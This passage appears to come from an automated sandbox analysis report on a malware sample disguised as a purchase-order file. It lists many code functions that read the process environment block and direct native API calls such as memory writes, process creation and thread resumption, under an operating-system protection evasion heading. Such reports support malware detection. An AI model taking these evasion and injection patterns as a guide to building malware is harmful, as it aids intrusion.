                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018062A0 mov eax, dword ptr fs:[00000030h]2_2_018062A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018062A0 mov eax, dword ptr fs:[00000030h]2_2_018062A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018062A0 mov eax, dword ptr fs:[00000030h]2_2_018062A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018062A0 mov eax, dword ptr fs:[00000030h]2_2_018062A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176A250 mov eax, dword ptr fs:[00000030h]2_2_0176A250
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01776259 mov eax, dword ptr fs:[00000030h]2_2_01776259
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F8243 mov eax, dword ptr fs:[00000030h]2_2_017F8243
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F8243 mov ecx, dword ptr fs:[00000030h]2_2_017F8243
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176823B mov eax, dword ptr fs:[00000030h]2_2_0176823B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017802E1 mov eax, dword ptr fs:[00000030h]2_2_017802E1
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017802E1 mov eax, dword ptr fs:[00000030h]2_2_017802E1
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017802E1 mov eax, dword ptr fs:[00000030h]2_2_017802E1
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A2C3 mov eax, dword ptr fs:[00000030h]2_2_0177A2C3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A2C3 mov eax, dword ptr fs:[00000030h]2_2_0177A2C3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A2C3 mov eax, dword ptr fs:[00000030h]2_2_0177A2C3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A2C3 mov eax, dword ptr fs:[00000030h]2_2_0177A2C3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A2C3 mov eax, dword ptr fs:[00000030h]2_2_0177A2C3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0182A250 mov eax, dword ptr fs:[00000030h]2_2_0182A250
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0182A250 mov eax, dword ptr fs:[00000030h]2_2_0182A250
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017802A0 mov eax, dword ptr fs:[00000030h]2_2_017802A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017802A0 mov eax, dword ptr fs:[00000030h]2_2_017802A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F0283 mov eax, dword ptr fs:[00000030h]2_2_017F0283
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F0283 mov eax, dword ptr fs:[00000030h]2_2_017F0283
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F0283 mov eax, dword ptr fs:[00000030h]2_2_017F0283
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE284 mov eax, dword ptr fs:[00000030h]2_2_017AE284
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE284 mov eax, dword ptr fs:[00000030h]2_2_017AE284
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A656A mov eax, dword ptr fs:[00000030h]2_2_017A656A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A656A mov eax, dword ptr fs:[00000030h]2_2_017A656A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A656A mov eax, dword ptr fs:[00000030h]2_2_017A656A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01778550 mov eax, dword ptr fs:[00000030h]2_2_01778550
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01778550 mov eax, dword ptr fs:[00000030h]2_2_01778550
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E53E mov eax, dword ptr fs:[00000030h]2_2_0179E53E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E53E mov eax, dword ptr fs:[00000030h]2_2_0179E53E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E53E mov eax, dword ptr fs:[00000030h]2_2_0179E53E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E53E mov eax, dword ptr fs:[00000030h]2_2_0179E53E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E53E mov eax, dword ptr fs:[00000030h]2_2_0179E53E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780535 mov eax, dword ptr fs:[00000030h]2_2_01780535
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780535 mov eax, dword ptr fs:[00000030h]2_2_01780535
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780535 mov eax, dword ptr fs:[00000030h]2_2_01780535
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780535 mov eax, dword ptr fs:[00000030h]2_2_01780535
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780535 mov eax, dword ptr fs:[00000030h]2_2_01780535
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780535 mov eax, dword ptr fs:[00000030h]2_2_01780535
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01806500 mov eax, dword ptr fs:[00000030h]2_2_01806500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844500 mov eax, dword ptr fs:[00000030h]2_2_01844500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844500 mov eax, dword ptr fs:[00000030h]2_2_01844500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844500 mov eax, dword ptr fs:[00000030h]2_2_01844500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844500 mov eax, dword ptr fs:[00000030h]2_2_01844500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844500 mov eax, dword ptr fs:[00000030h]2_2_01844500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844500 mov eax, dword ptr fs:[00000030h]2_2_01844500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844500 mov eax, dword ptr fs:[00000030h]2_2_01844500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017725E0 mov eax, dword ptr fs:[00000030h]2_2_017725E0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AC5ED mov eax, dword ptr fs:[00000030h]2_2_017AC5ED
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AC5ED mov eax, dword ptr fs:[00000030h]2_2_017AC5ED
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017765D0 mov eax, dword ptr fs:[00000030h]2_2_017765D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AA5D0 mov eax, dword ptr fs:[00000030h]2_2_017AA5D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AA5D0 mov eax, dword ptr fs:[00000030h]2_2_017AA5D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE5CF mov eax, dword ptr fs:[00000030h]2_2_017AE5CF
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE5CF mov eax, dword ptr fs:[00000030h]2_2_017AE5CF
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017945B1 mov eax, dword ptr fs:[00000030h]2_2_017945B1
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017945B1 mov eax, dword ptr fs:[00000030h]2_2_017945B1
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F05A7 mov eax, dword ptr fs:[00000030h]2_2_017F05A7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F05A7 mov eax, dword ptr fs:[00000030h]2_2_017F05A7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F05A7 mov eax, dword ptr fs:[00000030h]2_2_017F05A7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE59C mov eax, dword ptr fs:[00000030h]2_2_017AE59C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A4588 mov eax, dword ptr fs:[00000030h]2_2_017A4588
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01772582 mov eax, dword ptr fs:[00000030h]2_2_01772582
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01772582 mov ecx, dword ptr fs:[00000030h]2_2_01772582
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179A470 mov eax, dword ptr fs:[00000030h]2_2_0179A470
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179A470 mov eax, dword ptr fs:[00000030h]2_2_0179A470
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179A470 mov eax, dword ptr fs:[00000030h]2_2_0179A470
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0182A49A mov eax, dword ptr fs:[00000030h]2_2_0182A49A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FC460 mov ecx, dword ptr fs:[00000030h]2_2_017FC460
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179245A mov eax, dword ptr fs:[00000030h]2_2_0179245A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176645D mov eax, dword ptr fs:[00000030h]2_2_0176645D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AA430 mov eax, dword ptr fs:[00000030h]2_2_017AA430
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176C427 mov eax, dword ptr fs:[00000030h]2_2_0176C427
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176E420 mov eax, dword ptr fs:[00000030h]2_2_0176E420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176E420 mov eax, dword ptr fs:[00000030h]2_2_0176E420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176E420 mov eax, dword ptr fs:[00000030h]2_2_0176E420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6420 mov eax, dword ptr fs:[00000030h]2_2_017F6420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6420 mov eax, dword ptr fs:[00000030h]2_2_017F6420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6420 mov eax, dword ptr fs:[00000030h]2_2_017F6420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6420 mov eax, dword ptr fs:[00000030h]2_2_017F6420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6420 mov eax, dword ptr fs:[00000030h]2_2_017F6420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6420 mov eax, dword ptr fs:[00000030h]2_2_017F6420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6420 mov eax, dword ptr fs:[00000030h]2_2_017F6420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A8402 mov eax, dword ptr fs:[00000030h]2_2_017A8402
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A8402 mov eax, dword ptr fs:[00000030h]2_2_017A8402
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A8402 mov eax, dword ptr fs:[00000030h]2_2_017A8402
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017704E5 mov ecx, dword ptr fs:[00000030h]2_2_017704E5
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A44B0 mov ecx, dword ptr fs:[00000030h]2_2_017A44B0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FA4B0 mov eax, dword ptr fs:[00000030h]2_2_017FA4B0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0182A456 mov eax, dword ptr fs:[00000030h]2_2_0182A456
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017764AB mov eax, dword ptr fs:[00000030h]2_2_017764AB
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01778770 mov eax, dword ptr fs:[00000030h]2_2_01778770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181678E mov eax, dword ptr fs:[00000030h]2_2_0181678E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FE75D mov eax, dword ptr fs:[00000030h]2_2_017FE75D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018247A0 mov eax, dword ptr fs:[00000030h]2_2_018247A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01770750 mov eax, dword ptr fs:[00000030h]2_2_01770750
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F4755 mov eax, dword ptr fs:[00000030h]2_2_017F4755
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2750 mov eax, dword ptr fs:[00000030h]2_2_017B2750
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2750 mov eax, dword ptr fs:[00000030h]2_2_017B2750
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A674D mov esi, dword ptr fs:[00000030h]2_2_017A674D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A674D mov eax, dword ptr fs:[00000030h]2_2_017A674D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A674D mov eax, dword ptr fs:[00000030h]2_2_017A674D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A273C mov eax, dword ptr fs:[00000030h]2_2_017A273C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A273C mov ecx, dword ptr fs:[00000030h]2_2_017A273C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A273C mov eax, dword ptr fs:[00000030h]2_2_017A273C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EC730 mov eax, dword ptr fs:[00000030h]2_2_017EC730
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AC720 mov eax, dword ptr fs:[00000030h]2_2_017AC720
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AC720 mov eax, dword ptr fs:[00000030h]2_2_017AC720
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01770710 mov eax, dword ptr fs:[00000030h]2_2_01770710
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A0710 mov eax, dword ptr fs:[00000030h]2_2_017A0710
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AC700 mov eax, dword ptr fs:[00000030h]2_2_017AC700
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017747FB mov eax, dword ptr fs:[00000030h]2_2_017747FB
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017747FB mov eax, dword ptr fs:[00000030h]2_2_017747FB
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtSetInformationThread: Direct from: 0x77D62B4C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtCreateKey: Direct from: 0x77D62C6C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtReadVirtualMemory: Direct from: 0x77D62E8C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtQueryAttributesFile: Direct from: 0x77D62E6C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtQuerySystemInformation: Direct from: 0x77D648CC
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtQueryVolumeInformationFile: Direct from: 0x77D62F2C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtAllocateVirtualMemory: Direct from: 0x77D648EC
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtOpenSection: Direct from: 0x77D62E0C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtDeviceIoControlFile: Direct from: 0x77D62AEC
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtQuerySystemInformation: Direct from: 0x77D62DFC
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtReadFile: Direct from: 0x77D62ADC
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtDelayExecution: Direct from: 0x77D62DDC
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtQueryInformationProcess: Direct from: 0x77D62C26
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtResumeThread: Direct from: 0x77D62FBC
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtWriteVirtualMemory: Direct from: 0x77D6490C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtCreateUserProcess: Direct from: 0x77D6371C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtClose: Direct from: 0x77D62B6C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtAllocateVirtualMemory: Direct from: 0x77D63C9C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtSetInformationProcess: Direct from: 0x77D62C5C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtNotifyChangeKey: Direct from: 0x77D63C2C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtProtectVirtualMemory: Direct from: 0x77D62F9C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtSetInformationThread: Direct from: 0x77D563F9
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe NtWriteVirtualMemory: Direct from: 0x77D62E3C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtCreateMutant: Direct from: 0x77D635CCJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtResumeThread: Direct from: 0x77D636ACJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtMapViewOfSection: Direct from: 0x77D62D1CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtProtectVirtualMemory: Direct from: 0x77D57B2EJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtAllocateVirtualMemory: Direct from: 0x77D62BFCJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtAllocateVirtualMemory: Direct from: 0x77D62BECJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtQueryInformationToken: Direct from: 0x77D62CACJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtCreateFile: Direct from: 0x77D62FECJump to behavior
